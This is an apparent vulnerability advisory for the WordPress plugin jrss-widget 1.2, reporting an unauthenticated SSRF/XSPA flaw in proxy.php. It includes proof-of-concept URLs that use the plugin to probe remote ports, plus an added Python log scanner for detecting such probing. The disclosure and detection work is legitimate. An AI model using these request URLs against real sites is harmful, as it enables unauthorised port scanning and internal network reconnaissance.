wp-plugin : jrss-widget – SSRF/XSPA

 

Plugin Details

 

Plugin Name : jrss-widget

 

Affected Version : 1.2 (and most probably lower versions, if any)

 
Vulnerability : SSRF/XSPA
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

1. Test for Open port 80 :
http://localhost/wordpress/wp-content/jrss-widget/proxy.php?url=http://scanme.nmap.org:80

[Screenshot: open port 80]
2. Test for Open NON HTTP Ports (like SSH, FTP, SMTP etc) :
http://127.0.0.1/wordpress/wp-content/wp-plugs/jrss-widget/proxy.php?url=http://scanme.nmap.org:22

[Screenshot: open port 22]

3. Test for Closed Port 21:
localhost/wordpress/wp-content/wp-plugs/jrss-widget/proxy.php?url=http://scanme.nmap.org:21
[Screenshot: closed port 21]
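
One way to look for this probing in web server logs, as an added example that is not part of the original advisory or the plugin's code: it flags requests to proxy.php whose url parameter points at a non-feed port or an internal address, grouped by client. The combined log format, the FEED_PORTS allowlist and the sample log lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')  # client IP, target
PROXY_SUFFIX = "/jrss-widget/proxy.php"  # endpoint named in the PoC URLs
FEED_PORTS = {80, 443}                   # assumption: feeds are served only on these
SAMPLE_LOG = [  # constructed access-log lines modelled on the PoC requests
    '203.0.113.7 - - [28/May/2014:10:00:01 +0000] "GET /wordpress/wp-content/wp-plugs/jrss-widget/proxy.php?url=http://scanme.nmap.org:22 HTTP/1.1" 200 41',
    '203.0.113.7 - - [28/May/2014:10:00:02 +0000] "GET /wordpress/wp-content/wp-plugs/jrss-widget/proxy.php?url=http://scanme.nmap.org:21 HTTP/1.1" 200 0',
    '198.51.100.4 - - [28/May/2014:10:05:00 +0000] "GET /wordpress/wp-content/wp-plugs/jrss-widget/proxy.php?url=http://example.org/feed.xml HTTP/1.1" 200 5120',
    '198.51.100.9 - - [28/May/2014:10:06:00 +0000] "GET /wordpress/wp-content/wp-plugs/jrss-widget/proxy.php?url=http%3A%2F%2F127.0.0.1%2F HTTP/1.1" 200 900',
]

def classify(target):
    """Return the reasons a proxy.php request looks like SSRF/XSPA probing ([] if none)."""
    path, _, query = target.partition("?")
    if not path.endswith(PROXY_SUFFIX):
        return []
    reasons = []
    for raw in parse_qs(query).get("url", []):
        try:
            dest = urlsplit(raw)
            port = dest.port
        except ValueError:  # malformed host or non-numeric/out-of-range port
            reasons.append("unparseable url")
            continue
        if port is None:
            port = 443 if dest.scheme == "https" else 80
        if dest.scheme not in ("http", "https"):
            reasons.append(f"non-http scheme: {dest.scheme or 'none'}")
        elif port not in FEED_PORTS:
            reasons.append(f"non-feed port: {port}")
        host = (dest.hostname or "").lower()
        try:  # is_private also covers the loopback and link-local ranges
            internal = ipaddress.ip_address(host).is_private
        except ValueError:  # a hostname, not an IP literal
            internal = host == "localhost"
        if internal:
            reasons.append(f"internal address: {host}")
    return reasons

def scan(lines):  # client IP -> [(request target, reasons)]
    hits = defaultdict(list)
    for m in filter(None, map(LOG_RE.match, lines)):
        if reasons := classify(m.group(2)):
            hits[m.group(1)].append((m.group(2), reasons))
    return dict(hits)
```

A request for port 80 on an external host looks the same as a normal feed fetch to this rule, so PoC request 1 is not flagged; several distinct ports requested by one client is the stronger signal.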

 

Disclosure Timeline

 

Vendor Contacted : 2013-12-26

 
Plugin Status : Closed
 
Public Disclosure : May 28, 2014
 
CVE Number : Not assigned yet

 
Plugin Description :
 
`jRSS Widget` is a jquery based RSS reader widget.

= There are the following configuration options: =

* Select feed URL
* Choose width of the readerbox
* Choose height of the readerbox
